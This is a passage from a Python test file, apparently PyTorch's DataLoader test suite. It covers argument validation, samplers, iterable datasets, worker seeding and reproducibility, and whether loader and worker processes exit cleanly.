self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader cleanly exit when the process errors
# 1. having an reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't configured for each worker, so for
# the equality test below to be valid, we cannot have more than 1 workers.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
@unittest.skipIf(IS_MACOS, "Not working on macos")
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows and jetson devices don't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS and not IS_JETSON:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
@skipIfNoNumpy
def test_multiprocessing_iterdatapipe(self):
# Testing to make sure that function from global scope (e.g. imported from library) can be serialized
# and used with multiprocess DataLoader
reference = [torch.as_tensor([[2, 3, 4, 5]], dtype=torch.int64),
torch.as_tensor([[2, 3, 4, 5]], dtype=torch.int64)]
datapipe: IterDataPipe = IterableWrapper([[1, 2, 3, 4], [1, 2, 3, 4, 5, 6]])
datapipe = datapipe.map(row_processor)
datapipe = datapipe.filter(lambda row: len(row) == 4) if HAS_DILL else datapipe.filter(filter_len)
dl_common_args = dict(num_workers=2, batch_size=2, shuffle=True, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
self.assertEqual(reference,
[t.type(torch.int64)
for t in self._get_data_loader(datapipe, multiprocessing_context=ctx, **dl_common_args)])
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(reference,
[t.type(torch.int64)
for t in
self._get_data_loader(datapipe, multiprocessing_context=ctx, **dl_common_args)])
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_multi_epochs_reproducibility(self):
num_workers = 2
batch_size = 10
num_epochs = 3
dataset = TestMultiEpochDataset(batch_size * num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size,
shuffle=False, num_workers=num_workers)
for ind in range(num_epochs):
for batch_idx, sample in enumerate(dataloader):
self.assertEqual(sample.tolist(), [batch_idx % num_workers] * batch_size)
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_seqential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_seqential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement and without specified num_samples
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# test sample without replacement and with specified num_samples
n = len(self.dataset) * 2
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == len(self.dataset))
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
n = len(self.dataset) - 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
n = len(self.dataset) + 1
sampler_without_replacement = RandomSampler(self.dataset, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 1)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == n)
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_random_sampler_len_without_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=False,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples // batch_size + (num_samples % batch_size > 0),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
for sampler in (
RandomSampler(self.dataset, num_samples=5, replacement=True),
RandomSampler(self.dataset, replacement=False),
WeightedRandomSampler(weights, num_samples=5, replacement=True),
WeightedRandomSampler(weights, num_samples=5, replacement=False),
SubsetRandomSampler(range(10)),
):
torch.manual_seed(0)
l1 = list(sampler) + list(sampler)
torch.manual_seed(0)
l2 = list(sampler) + list(sampler)
self.assertEqual(l1, l2)
its = (iter(sampler), iter(sampler))
ls = ([], [])
for idx in range(len(sampler)):
for i in range(2):
if idx == 0:
torch.manual_seed(0)
ls[i].append(next(its[i]))
self.assertEqual(ls[0], ls[1])
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Using NumPy generated states as the reference to test `_generate_state`
# having the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
(r'''There might be ConnectionResetError or leaked semaphore warning '''
r'''(due to dirty process exit), but they are all safe to ignore''')
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
# iterator. This is interesting because Python3 error traces holds a
# reference to the frames, which hold references to all the local
# variables including the iterator, and then the iterator dtor may
# not be called before process end. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal testing process
# that various things are setup, including that the worker pids
# are specified in `worker_pids` array.
loader_setup_event = mp.Event()
# Event that this process has finished setting up, and the
# loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to setup within given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
